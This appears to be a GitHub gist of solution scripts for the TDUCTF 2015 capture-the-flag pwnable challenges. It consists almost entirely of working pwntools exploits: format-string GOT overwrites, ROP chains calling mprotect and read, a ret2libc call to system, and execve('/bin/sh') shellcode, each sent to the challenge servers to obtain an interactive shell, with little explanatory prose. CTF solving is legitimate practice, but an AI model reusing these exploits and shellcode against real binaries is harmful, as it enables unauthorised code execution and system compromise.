Skip to content

Instantly share code, notes, and snippets.

@rekkusu

rekkusu/charlotte.py

Last active August 31, 2015 09:41
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rekkusu/6c9edaa805832418624d to your computer and use it in GitHub Desktop.
Save rekkusu/6c9edaa805832418624d to your computer and use it in GitHub Desktop.
Download ZIP
TDUCTF 2015 Pwnable writeup
Raw
charlotte.py
from pwn import *
from libformatstr import FormatStr
import time
s = remote('crackme.sakura.tductf.org', 10773)
read_secret = 0x0804875d
strlen_got = 0x8049138
exit_got = 0x804912c
puts_plt = 0x8048580
s.recvuntil('You: ')
fmt = FormatStr()
fmt[strlen_got] = puts_plt
fmt[exit_got] = read_secret
payload = fmt.payload(6)
s.send(payload + '\n')
s.interactive()
Raw
charlotte2.py
from pwn import *
from libformatstr import FormatStr
import time
s = remote('crackme.sakura.tductf.org', 10773)
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
buf = 0x80491a0
exit_got = 0x804912c
s.recvuntil('You: ')
fmt = FormatStr()
fmt[exit_got] = buf
payload = fmt.payload(6)
s.send(payload + '\n')
s.send(sc + '\n')
s.interactive()
Raw
ins.py
from pwn import *
import time
s = remote('crackme.sakura.tductf.org', 10195)
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
read_plt = 0x080483a0
mprotect_plt = 0x8048390
popret = 0x8048365
pop3ret = 0x80485d9
buf = 0x8049000
payload = ''.join([
'A' * 16,
p32(mprotect_plt),
p32(pop3ret),
p32(buf),
p32(0x1000),
p32(0x7),
p32(read_plt),
p32(popret),
p32(0),
p32(buf),
p32(0x100)
])
print 'len:', len(payload)
assert(len(payload) <= 0x38)
s.send(payload)
time.sleep(0.5)
s.send(sc)
s.interactive()
Raw
program.py
# She'll code ...
from pwn import *
import time
s = remote('crackme.sakura.tductf.org', 47806)
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
buf = 0x8049aa0
s.recvuntil('about you:')
s.send(p32(buf + 4) + sc + '\n')
s.recvuntil('message:')
payload = ''.join([
'A' * 38,
p32(0x8049aa0 + 4)
])
s.send(payload + '\n')
s.interactive()
Raw
r2lfn.py
# ret2libc for newbie
from pwn import *
s = remote('crackme.sakura.tductf.org', 10170)
system_plt = 0x8048410
binsh = 0x80486ad
s.send('A' * 16 + p32(system_plt) + 'BBBB' + p32(binsh))
s.interactive()
Raw
ropuzzle.py
from pwn import *
import time
s = remote('crackme.sakura.tductf.org', 20562)
# waiting pieces
time.sleep(2)
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
pop3ret = 0x8048b19
memset_plt = 0x8048660
s.recvuntil('Pieces will be here: ')
executable = int(s.recvuntil('\n'), 16)
print 'exec:', hex(executable)
payload = ''
for i in range(len(sc)):
payload += ''.join([
p32(memset_plt),
p32(pop3ret),
p32(executable + i),
p32(ord(sc[i])),
p32(1),
])
payload += p32(executable)
s.send(payload)
s.interactive()
Raw
ropuzzle2.py
from pwn import *
import time
# memset無し版(CTF終了後解いた)
#s = remote('crackme.sakura.tductf.org', 20562)
s = remote('192.168.6.129', 4000)
# waiting pieces
time.sleep(2)
s.recvuntil('Pieces will be here: ')
piece = int(s.recvuntil('\n'), 16)
print 'piece:', hex(piece)
s.recvuntil('board: ')
rop_buf = int(s.recvuntil('\n'), 16)
print 'rop_buf:', hex(rop_buf)
int80 = piece & 0xffff0000 | 0x80cd
payload = ''.join([
p32(piece + 0x10), # pop eax
p32(int80),
p32(piece + 0x50), # mov [eax], ax
p32(piece + 0x10), # pop eax
p32(11),
p32(piece + 0x16), # pop ebx
p32(rop_buf + 0x80),
p32(piece + 0x12), # pop ecx
p32(0),
p32(piece + 0x14), # pop edx
p32(0),
p32(int80)
])
payload = payload.ljust(0x80, 'A') + '/bin/sh\0'
s.send(payload)
s.interactive()
'''
pieces
00000000 50 push eax
00000001 C3 ret
00000002 51 push ecx
00000003 C3 ret
00000004 52 push edx
00000005 C3 ret
00000006 53 push ebx
00000007 C3 ret
00000008 54 push esp
00000009 C3 ret
0000000A 55 push ebp
0000000B C3 ret
0000000C 56 push esi
0000000D C3 ret
0000000E 57 push edi
0000000F C3 ret
00000010 58 pop eax
00000011 C3 ret
00000012 59 pop ecx
00000013 C3 ret
00000014 5A pop edx
00000015 C3 ret
00000016 5B pop ebx
00000017 C3 ret
00000018 5C pop esp
00000019 C3 ret
0000001A 5D pop ebp
0000001B C3 ret
0000001C 5E pop esi
0000001D C3 ret
0000001E 5F pop edi
0000001F C3 ret
00000020 83C404 add esp,byte +0x4
00000023 C3 ret
00000024 83C408 add esp,byte +0x8
00000027 C3 ret
00000028 83C40C add esp,byte +0xc
0000002B C3 ret
0000002C 83EC04 sub esp,byte +0x4
0000002F C3 ret
00000030 83EC08 sub esp,byte +0x8
00000033 C3 ret
00000034 83EC0C sub esp,byte +0xc
00000037 C3 ret
00000038 FFD0 call eax
0000003A C3 ret
0000003B FFD1 call ecx
0000003D C3 ret
0000003E FFD2 call edx
00000040 C3 ret
00000041 FFD3 call ebx
00000043 C3 ret
00000044 FFD4 call esp
00000046 C3 ret
00000047 FFD5 call ebp
00000049 C3 ret
0000004A FFD6 call esi
0000004C C3 ret
0000004D 8900 mov [eax],eax
0000004F C3 ret
00000050 668900 mov [eax],ax
00000053 C3 ret
00000054 8800 mov [eax],al
00000056 C3 ret
00000057 8820 mov [eax],ah
00000059 C3 ret
'''
Raw
ropuzzle3.py
from pwn import *
import time
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd80'.decode('hex')
relocation = 0x8048560
read_offset = 0x8
#s = remote('crackme.sakura.tductf.org', 20562)
s = remote('192.168.6.129', 4000)
# waiting pieces
time.sleep(2)
s.recvuntil('Pieces will be here: ')
piece = int(s.recvuntil('\n'), 16)
print 'piece:', hex(piece)
s.recvuntil('board: ')
rop_buf = int(s.recvuntil('\n'), 16)
print 'rop_buf:', hex(rop_buf)
payload = ''.join([
p32(relocation),
p32(read_offset),
p32(piece),
p32(0),
p32(piece),
p32(0x100),
])
s.send(payload)
time.sleep(0.5)
s.send(sc)
s.interactive()
Raw
sfn.py
# shellcode for newbie
from pwn import *
s = remote('crackme.sakura.tductf.org', 10150)
sc = '31c931d252682f2f7368682f62696e89e331c0b00bcd8000'.decode('hex')
s.send(sc.ljust(256, '\0'))
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment